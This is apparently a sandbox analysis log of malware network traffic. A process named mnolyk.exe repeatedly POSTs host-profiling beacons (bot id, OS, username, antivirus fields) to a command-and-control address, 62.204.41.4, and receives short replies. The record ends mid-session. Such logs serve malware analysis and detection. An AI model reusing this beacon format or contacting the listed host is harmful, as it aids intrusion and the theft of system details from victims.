                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      129192.168.2.74982462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:34.508276939 CET244OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.572290897 CET244INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      13192.168.2.74970762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:04.724651098 CET117OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.789779902 CET117INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      130192.168.2.74982562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:34.754203081 CET245OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.818792105 CET245INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      131192.168.2.74982662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:34.986762047 CET246OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.052656889 CET246INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      132192.168.2.74982762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:35.253284931 CET247OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.315601110 CET247INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      133192.168.2.74982862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:35.504498005 CET248OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.568485022 CET248INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      134192.168.2.74982962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:35.738938093 CET249OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:35.803982019 CET249INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      135192.168.2.74983062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:35.970669031 CET250OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.035929918 CET250INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      136192.168.2.74983162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:36.211397886 CET251OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.275892973 CET251INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      137192.168.2.74983262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:36.601999998 CET252OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.665698051 CET252INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      138192.168.2.74983362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:36.871623993 CET253OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:36.935492039 CET253INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      139192.168.2.74983462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:37.138339043 CET254OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:37.202564001 CET254INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      14192.168.2.74970862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:04.970650911 CET118OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.035841942 CET118INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      140192.168.2.74983562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:37.902415991 CET255OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:37.965897083 CET255INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      141192.168.2.74983662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:38.152612925 CET256OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:38.219290018 CET256INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      142192.168.2.74983762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:38.971374989 CET257OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:39.035603046 CET257INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      143192.168.2.74983862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:39.576742887 CET258OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:39.640382051 CET258INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      144192.168.2.74983962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:39.819277048 CET259OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:39.882565975 CET259INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      145192.168.2.74984062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:40.053783894 CET260OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:40.117824078 CET260INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      146192.168.2.74984162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:40.291176081 CET261OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
